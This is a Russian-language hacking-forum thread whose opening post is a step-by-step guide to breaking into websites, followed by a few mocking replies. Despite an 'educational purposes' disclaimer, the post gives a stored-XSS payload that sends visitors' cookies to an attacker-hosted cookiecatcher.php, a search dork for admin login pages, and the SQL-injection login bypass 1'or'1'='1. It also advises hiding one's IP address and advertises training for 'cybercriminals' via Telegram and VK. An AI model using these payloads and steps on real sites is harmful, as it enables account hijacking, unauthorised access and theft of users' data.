Загрузка...

Как взломать веб–сайт?

Тема в разделе Веб уязвимости создана пользователем gangstergang_inactive834656 27 фев 2019. 2274 просмотра

Загрузка...
  1. gangstergang_inactive834656
    gangstergang_inactive834656 Автор темы 27 фев 2019 Заблокирован(а) 99 19 янв 2019
    Обратите внимание: эта инструкция приведена исключительно в образовательных целях, чтобы помочь изучить методы взлома в законных целях и понять принцип работы хакеров для защиты своих веб-сайтов. Эта инструкция поможет получить доступ к веб-сайтам с НИЗКИМ уровнем защиты.Применение межсайтового скриптинга
    [IMG]
    1. Найдите уязвимый сайт, на котором можно размещать контент. Хороший пример - доска объявлений. Помните, если сайт хорошо защищен, это не сработает.
    [IMG]
    1. Перейдите к созданию поста. Вам нужно в тело поста вставить специальный код, собирающий данные тех, кто на него кликнет.Вы захотите проверить, отсеивает ли система код. Опубликуйте <script...>alert(“test”)</...script> (не забудьте убрать “…”). Если при нажатии на свой пост появляется окно с предупреждением, тогда этот сайт уязвим для атаки.
    [IMG]
    1. Создайте и загрузите свой php-скрипт, который будет получать данные.Цель этой атаки - собрать пользовательские данные типа "cookie", хранящие информацию об учетных записях пользователей. Ее можно использовать для входа в их аккаунты на уязвимых веб-сайтах. Вам потребуется php-скрипт, который будет воровать куки вашей цели и перенаправлять их на ваш сайт. Загрузите php-скрипт на веб-сайт, к которому у вас есть доступ и который поддерживает php. Пример кода php-скрипта можно найти в разделе "Примеры".
    [IMG]

    1. Опубликуйте JavaScript-код. Введите в тело поста JavaScript-код, который будет воровать куки и отправлять их на ваш сайт. Чтобы сделать пост менее подозрительным и уберечь его от удаления, после кода впишите какой-нибудь текст.Пример кода будет выглядеть следующим образом: <...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(document.location=”ВАШURL/cookiecatcher.php?c=”+document.cookie)><.../iframe> (удалите ...).
    [IMG]

    1. Использование полученных куки. После этого можете использовать сохраненные у вас на веб-сайте данные куки для любых целей.
    Метод 2
    Выполнение инъекционных атак

    [IMG]

    1. Найдите уязвимый сайт. Вам нужно найти уязвимый сайт с легкодоступным входом в качестве администратора. Попробуйте поискать в Google по запросу admin login.asp.
    [IMG]

    1. Вход в качестве администратора. В поле "логин" введите admin, а в качестве пароля используйте одну из нескольких комбинаций. Может быть много разных вариантов, но распространенным параметром является 1’or’1’=’1.
    [IMG]

    1. Не теряйте терпение. Вам потребуется некоторое время для проб и ошибок.
    [IMG]

    1. Получите доступ на веб-сайт. В конце концов, у вас должно получиться найти комбинацию, которая позволит зайти на веб-сайт под логином администратора, конечно, если сайт уязвим к атакам.
    Метод 3
    Основа для успеха

    [IMG]

    1. Выучите один или несколько языков программирования. Если вы действительно хотите научится взламывать веб-сайты, вам нужно понять принцип работы компьютера и других технологий. Изучите такие языки программирования, как Python или SQL, они позволят вам лучше владеть компьютером и найти слабые места систем.
    [IMG]

    1. Изучите язык HTML на базовом уровне. Чтобы взламывать веб-сайты, вам нужно иметь четкое представление о языках html и javascript. Это требует немало времени, но в интернете достаточно бесплатных способов для изучения, поэтому главное - желание, а возможности всегда найдутся.
    [IMG]

    1. Проконсультируйтесь с «белыми» хакерами. "Белые" хакеры - это те, кто использует свои знания на благо добра, выявляя уязвимости систем безопасности и делая этим Интернет лучшим местом для всех. Если вы хотите научиться взлому, чтобы использовать его на благо добра или защитить ваш собственный веб-сайт, возможно, вам понадобится консультация "белых" хакеров.
    [IMG]

    1. Исследуйте взлом. Если вы хотите стать хакером или защитить себя, вам предстоит во многом разобраться. На данный момент существует множество дыр в безопасности веб-сайтов и их список пополняется с каждым днем, поэтому вы постоянно должны обучаться.
    [IMG]

    1. Будьте в курсе. Поскольку список возможных путей взлома постоянно меняется, вы должны идти в ногу со временем. Если сейчас вы защищены от некоторых типов атак, это не значит, что вы будете в безопасности завтра!
    Советы
    • Почитайте хакерские форумы, чтобы получить много полезных советов.
    Предупреждения
    • Если вы решили испробовать свои хакерские навыки в реальном мире, не забудьте скрыть свой IP-адрес с помощью программного обеспечения, доступного в сети Интернет.
    • Прочитав эту статью, вы не станете хакером немедленно. Совершенствуйте свои навыки и практикуйтесь, практикуйтесь и еще раз практикуйтесь.
    • Помните, деятельность хакеров является незаконной. Если вас поймают, это ваша вина.
    В этой статье я показал основу взлома взлома веб-сайте.
    У тебя назрел вопрос: "А где можно приобрести такие знания?".
    ─ Этому обучаю Я!
    У меня ты научишься всему, что должен знать настоящий хакер и киберпреступник.

    Если тебе интересно и остались дополнительные вопросы то пиши:
    Telegram ─ https://t.me/dinobambino
    VK ─ https://vk.com/gimbarez

    Либо в ЛС.
     
  2. rondy
    rondy 27 фев 2019 245 21 авг 2018
    битые пикчи
     
  3. Larsalex
    Larsalex 27 фев 2019 WEB 94 17 авг 2017
    Ищи сайты на которых можно писать свой быдлокод на js или пыхе
     
  4. lakicry
    lakicry 3 апр 2019 Я в домике. 2 2 апр 2019
    Это больше смахивает на... "ХОЧЕШЬ СТАТЬ СИЛЬНЫМ? МНОГО ЕШЬ И ЗАНИМАЙСЯ СПОРТОМ, И ТЫ СКОРО СТАНЕШЬ СИЛЬНЫМ"...
     
Top